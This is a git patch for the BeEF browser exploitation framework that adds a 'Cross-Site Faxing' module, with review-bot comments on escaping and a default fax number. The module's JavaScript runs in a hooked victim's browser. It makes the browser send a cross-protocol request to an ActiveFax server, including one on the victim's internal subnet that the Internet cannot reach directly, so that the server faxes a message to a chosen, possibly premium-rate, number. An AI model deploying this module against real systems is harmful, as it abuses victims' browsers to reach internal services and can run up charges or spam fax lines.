From 7afa52ec99ae6fc5e5a05e0d128dc189711e0bab Mon Sep 17 00:00:00 2001
From: bmantra
Date: Fri, 29 Nov 2013 21:06:36 +0100
Subject: [PATCH] add module for Cross-Site Faxing (XSF)
---
modules/ipec/cross_site_faxing/command.js | 28 ++++++++++
modules/ipec/cross_site_faxing/config.yaml | 15 +++++
modules/ipec/cross_site_faxing/module.rb | 64 ++++++++++++++++++++++
3 files changed, 107 insertions(+)
create mode 100644 modules/ipec/cross_site_faxing/command.js
create mode 100644 modules/ipec/cross_site_faxing/config.yaml
create mode 100644 modules/ipec/cross_site_faxing/module.rb
diff --git a/modules/ipec/cross_site_faxing/command.js b/modules/ipec/cross_site_faxing/command.js
new file mode 100644
index 000000000..2fb19bdca
--- /dev/null
+++ b/modules/ipec/cross_site_faxing/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var target_ip = "<%= @ip %>";
+ var target_port = "<%= @port %>";
+ var recname = "<%= @recname %>";
+ var recfax = "<%= @recfax %>";
+ var subject = "<%= @subject %>";
+ var msg = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
+
+ var uri = "http://"+target_ip+":"+target_port+"/";
+ var post_body = "@F201 "+recname+"@@F211 "+recfax+"@@F307 "+subject+"@@F301 1@\n"+msg;
+
+ var xhr = new XMLHttpRequest();
+
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+ xhr.send(post_body);
+ setTimeout(function(){xhr.abort()}, 5000);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+
+});
+
diff --git a/modules/ipec/cross_site_faxing/config.yaml b/modules/ipec/cross_site_faxing/config.yaml
new file mode 100644
index 000000000..cec863347
--- /dev/null
+++ b/modules/ipec/cross_site_faxing/config.yaml
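Review bot: In `command.js` only `@msg` is escaped before it is placed inside a double-quoted JavaScript literal; `@ip`, `@port`, `@recname`, `@recfax` and `@subject` are interpolated raw, so a double quote, backslash or newline in any of those option values produces a syntax error or alters the script delivered to the browser. The `@msg` escaping itself leaves backslashes untouched, so a backslash directly before a `"` in the message still closes the literal early. Encoding every value the same way on the Ruby side would replace the hand-rolled quoting, e.g. `var subject = <%= @subject.to_json %>;` (this assumes `to_json` is loaded in the module's ERB context, which is not visible here). Separately, `'result=Message sent'` is reported immediately after `xhr.send()` whatever the outcome, so the logged result only means the request was issued; a comment such as `// result is reported before the request completes; it does not confirm delivery` would keep readers of the command log from over-trusting it.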
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ cross_site_faxing:
+ enable: true
+ category: "IPEC"
+ name: "Cross-Site Faxing (XSF)"
+ description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to ActiveFax RAW server socket (3000 by default) on the target specified in the 'Target Address' input field. This module can send a FAX to a (premium) faxnumber via the ActiveFax Server.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["all"]
diff --git a/modules/ipec/cross_site_faxing/module.rb b/modules/ipec/cross_site_faxing/module.rb
new file mode 100644
index 000000000..b18467bc9
--- /dev/null
+++ b/modules/ipec/cross_site_faxing/module.rb
@@ -0,0 +1,64 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cross_site_faxing < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
+ {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '3000'},
+ {'name'=>'recname', 'ui_label' => 'Name of the receiver', 'value' => 'BeEF'},
+ {'name'=>'recfax', 'ui_label' => 'Fax number of the recipient', 'value' => '+1 11 112233-2'},
+ {'name'=>'subject', 'ui_label' => 'Subject', 'value' => 'Got some BeEF?'},
+ {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"**********************************************************************
+
+ .O,
+ lkOl
+ od cOc
+ 'X, cOo.
+ cX, ,dkc.
+ BeEF ;Kd. ,odo,.
+ .dXl . .:xkl'
+ 'OKc .;c' ,oOk:
+ ,kKo. .cOkc. .lOk:.
+ .dXx. :KWKo. 'dXd.
+ .oXx. cXWW0c..dXd.
+ oW0 .OWWWNd.'KK.
+ ....,;lkNWx KWWWWX:'XK.
+ ,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd
+ K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0
+ od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx
+ :O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK.
+ 'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.
+ .N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.
+ 0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.
+ lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.
+ 0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl
+ oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX
+ .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:
+ .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+ 'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd
+ oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO
+ ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx
+ ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+ .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'
+ :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.
+ .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'
+ OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.
+ ,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,.
+ .N0 lOXNX0x; .KWWWWWWWWWWWNkc.
+ :NO, 'lXWWWWWWWWWNk:.
+ .dXN0OkxkO0NWWWWWWWWWWKl.
+ .';o0WWWWWWWWWWWNk;
+ .cxOKXKKOd;.
+
+**********************************************************************", 'width'=>'200px' }
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+end
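Review bot: The `recfax` option in `self.options` ships with a dialable-looking default (`'+1 11 112233-2'`), so running the module with its defaults asks the fax server to place a call to a number nobody chose; whether that number is assigned cannot be told from this file. An empty default, `'value' => ''`, makes the operator pick the recipient deliberately. None of the options is validated here before reaching `command.js`, where every value except `msg` is interpolated without escaping, so at least `port` would benefit from a numeric check on the Ruby side. A short comment above `post_execute` stating that the stored `result` only records that the request was issued would also help readers of the command log.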